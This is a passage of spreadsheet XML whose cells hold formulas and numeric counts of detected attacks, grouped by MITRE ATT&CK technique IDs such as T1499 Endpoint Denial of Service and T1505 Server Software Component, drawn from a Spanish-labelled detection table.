      <c r="AD49" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>163753</v>
      </c>
      <c r="AE49" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>196751</v>
      </c>
      <c r="AF49" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>176330</v>
      </c>
      <c r="AG49" s="322" t="str">
        <f t="shared" si="4"/>
        <v>176330 (196751)</v>
      </c>
      <c r="AH49" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>26</v>
      </c>
      <c r="AI49" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ49" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>118235</v>
      </c>
      <c r="AK49" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>573084</v>
      </c>
      <c r="AL49" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>486394</v>
      </c>
      <c r="AM49" s="322" t="str">
        <f t="shared" si="5"/>
        <v>486394 (573084)</v>
      </c>
      <c r="AN49" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>36</v>
      </c>
      <c r="AO49" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP49" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>224253</v>
      </c>
      <c r="AQ49" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR49" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS49" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT49" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU49" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV49" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW49" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>11832</v>
      </c>
      <c r="AX49" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>41</v>
      </c>
      <c r="AY49" s="322" t="str">
        <f t="shared" si="7"/>
        <v>41 (11832)</v>
      </c>
      <c r="AZ49" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>6</v>
      </c>
      <c r="BA49" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0.75</v>
      </c>
      <c r="BB49" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>41</v>
      </c>
      <c r="BC49" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>12707</v>
      </c>
      <c r="BD49" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>895</v>
      </c>
      <c r="BE49" s="4" t="str">
        <f t="shared" si="8"/>
        <v>895 (12707)</v>
      </c>
      <c r="BF49" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>11</v>
      </c>
      <c r="BG49" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH49" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>895</v>
      </c>
      <c r="BI49" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>649069</v>
      </c>
      <c r="BJ49" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>649068</v>
      </c>
      <c r="BK49" s="322" t="str">
        <f t="shared" si="9"/>
        <v>649068 (649069)</v>
      </c>
      <c r="BL49" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>4</v>
      </c>
      <c r="BM49" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>0.5</v>
      </c>
      <c r="BN49" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>649068</v>
      </c>
      <c r="BO49" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>1266580</v>
      </c>
      <c r="BP49" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>1255760</v>
      </c>
      <c r="BQ49" s="4" t="str">
        <f t="shared" si="10"/>
        <v>1255760 (1266580)</v>
      </c>
      <c r="BR49" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>4</v>
      </c>
      <c r="BS49" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>16</v>
      </c>
      <c r="BT49" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU49" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>649625</v>
      </c>
      <c r="BV49" s="292">
        <v>1432048</v>
      </c>
      <c r="BW49" s="322">
        <v>1428495</v>
      </c>
      <c r="BX49" s="4" t="str">
        <f t="shared" si="11"/>
        <v>1428495 (1432048)</v>
      </c>
      <c r="BY49" s="12">
        <v>5</v>
      </c>
      <c r="BZ49" s="13">
        <v>0.5</v>
      </c>
      <c r="CA49" s="394">
        <v>1363311</v>
      </c>
      <c r="CB49" s="288">
        <v>2864096</v>
      </c>
      <c r="CC49" s="4">
        <v>2791806</v>
      </c>
      <c r="CD49" s="4" t="str">
        <f t="shared" si="12"/>
        <v>2791806 (2864096)</v>
      </c>
      <c r="CE49" s="4">
        <v>5</v>
      </c>
      <c r="CF49" s="4">
        <v>4</v>
      </c>
      <c r="CG49" s="13">
        <v>0.5</v>
      </c>
      <c r="CH49" s="394">
        <v>1363311</v>
      </c>
    </row>
    <row r="50" spans="1:86" ht="15" customHeight="1">
      <c r="A50" s="4">
        <f t="shared" si="13"/>
        <v>48</v>
      </c>
      <c r="B50" s="4" t="str">
        <f>IFERROR(VLOOKUP(A50,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1499</v>
      </c>
      <c r="C50" s="493" t="str">
        <f>IFERROR(VLOOKUP(B50,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Endpoint Denial of Service</v>
      </c>
      <c r="D50" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B50)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>10</v>
      </c>
      <c r="E50" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2061420</v>
      </c>
      <c r="F50" s="579" t="str">
        <f t="shared" si="14"/>
        <v>10 (2061420)</v>
      </c>
      <c r="G50" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>11125</v>
      </c>
      <c r="H50" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>6346</v>
      </c>
      <c r="I50" s="322" t="str">
        <f t="shared" si="0"/>
        <v>6346 (11125)</v>
      </c>
      <c r="J50" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>10</v>
      </c>
      <c r="K50" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>0.5</v>
      </c>
      <c r="L50" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>6296</v>
      </c>
      <c r="M50" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>2</v>
      </c>
      <c r="N50" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>2</v>
      </c>
      <c r="O50" s="322" t="str">
        <f t="shared" si="1"/>
        <v>2 (2)</v>
      </c>
      <c r="P50" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>2</v>
      </c>
      <c r="Q50" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0.2</v>
      </c>
      <c r="R50" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>2</v>
      </c>
      <c r="S50" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>11127</v>
      </c>
      <c r="T50" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>6348</v>
      </c>
      <c r="U50" s="4" t="str">
        <f t="shared" si="2"/>
        <v>6348 (11127)</v>
      </c>
      <c r="V50" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>12</v>
      </c>
      <c r="W50" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>0.6</v>
      </c>
      <c r="X50" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>6297</v>
      </c>
      <c r="Y50" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>688007</v>
      </c>
      <c r="Z50" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>51403</v>
      </c>
      <c r="AA50" s="322" t="str">
        <f t="shared" si="3"/>
        <v>51403 (688007)</v>
      </c>
      <c r="AB50" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>12</v>
      </c>
      <c r="AC50" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>0.7</v>
      </c>
      <c r="AD50" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>33808</v>
      </c>
      <c r="AE50" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>116273</v>
      </c>
      <c r="AF50" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>76</v>
      </c>
      <c r="AG50" s="322" t="str">
        <f t="shared" si="4"/>
        <v>76 (116273)</v>
      </c>
      <c r="AH50" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>21</v>
      </c>
      <c r="AI50" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ50" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>63</v>
      </c>
      <c r="AK50" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>804280</v>
      </c>
      <c r="AL50" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>51479</v>
      </c>
      <c r="AM50" s="322" t="str">
        <f t="shared" si="5"/>
        <v>51479 (804280)</v>
      </c>
      <c r="AN50" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>41</v>
      </c>
      <c r="AO50" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP50" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>33828</v>
      </c>
      <c r="AQ50" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR50" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS50" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT50" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU50" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV50" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW50" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>658</v>
      </c>
      <c r="AX50" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>612</v>
      </c>
      <c r="AY50" s="322" t="str">
        <f t="shared" si="7"/>
        <v>612 (658)</v>
      </c>
      <c r="AZ50" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>3</v>
      </c>
      <c r="BA50" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0.3</v>
      </c>
      <c r="BB50" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>612</v>
      </c>
      <c r="BC50" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>11785</v>
      </c>
      <c r="BD50" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>6960</v>
      </c>
      <c r="BE50" s="4" t="str">
        <f t="shared" si="8"/>
        <v>6960 (11785)</v>
      </c>
      <c r="BF50" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>15</v>
      </c>
      <c r="BG50" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>0.7</v>
      </c>
      <c r="BH50" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>6862</v>
      </c>
      <c r="BI50" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>5743</v>
      </c>
      <c r="BJ50" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>5177</v>
      </c>
      <c r="BK50" s="322" t="str">
        <f t="shared" si="9"/>
        <v>5177 (5743)</v>
      </c>
      <c r="BL50" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>6</v>
      </c>
      <c r="BM50" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>0.3</v>
      </c>
      <c r="BN50" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>4662</v>
      </c>
      <c r="BO50" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>700863</v>
      </c>
      <c r="BP50" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>700295</v>
      </c>
      <c r="BQ50" s="4" t="str">
        <f t="shared" si="10"/>
        <v>700295 (700863)</v>
      </c>
      <c r="BR50" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>6</v>
      </c>
      <c r="BS50" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>21</v>
      </c>
      <c r="BT50" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>0.7</v>
      </c>
      <c r="BU50" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>361387</v>
      </c>
      <c r="BV50" s="292">
        <v>1839945</v>
      </c>
      <c r="BW50" s="322">
        <v>1120992</v>
      </c>
      <c r="BX50" s="4" t="str">
        <f t="shared" si="11"/>
        <v>1120992 (1839945)</v>
      </c>
      <c r="BY50" s="12">
        <v>6</v>
      </c>
      <c r="BZ50" s="13">
        <v>0.5</v>
      </c>
      <c r="CA50" s="394">
        <v>1116270</v>
      </c>
      <c r="CB50" s="288">
        <v>3679890</v>
      </c>
      <c r="CC50" s="4">
        <v>2237262</v>
      </c>
      <c r="CD50" s="4" t="str">
        <f t="shared" si="12"/>
        <v>2237262 (3679890)</v>
      </c>
      <c r="CE50" s="4">
        <v>6</v>
      </c>
      <c r="CF50" s="4">
        <v>2</v>
      </c>
      <c r="CG50" s="13">
        <v>0.5</v>
      </c>
      <c r="CH50" s="394">
        <v>1116270</v>
      </c>
    </row>
    <row r="51" spans="1:86" ht="15" customHeight="1">
      <c r="A51" s="4">
        <f t="shared" si="13"/>
        <v>49</v>
      </c>
      <c r="B51" s="4" t="str">
        <f>IFERROR(VLOOKUP(A51,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1505</v>
      </c>
      <c r="C51" s="493" t="str">
        <f>IFERROR(VLOOKUP(B51,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Server Software Component</v>
      </c>
      <c r="D51" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B51)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E51" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>3</v>
      </c>
      <c r="F51" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (3)</v>
      </c>
      <c r="G51" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>2</v>
      </c>
      <c r="H51" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>1</v>
      </c>
      <c r="I51" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (2)</v>
      </c>
      <c r="J51" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>1</v>
      </c>
      <c r="K51" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L51" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>1</v>
      </c>
      <c r="M51" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>0</v>
      </c>
      <c r="N51" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>0</v>
      </c>
      <c r="O51" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P51" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>0</v>
      </c>
      <c r="Q51" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0</v>
      </c>
      <c r="R51" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>0</v>
      </c>
      <c r="S51" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>2</v>
      </c>
      <c r="T51" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>1</v>
      </c>
      <c r="U51" s="4" t="str">
        <f t="shared" si="2"/>
        <v>1 (2)</v>
      </c>
      <c r="V51" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>1</v>
      </c>
      <c r="W51" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X51" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
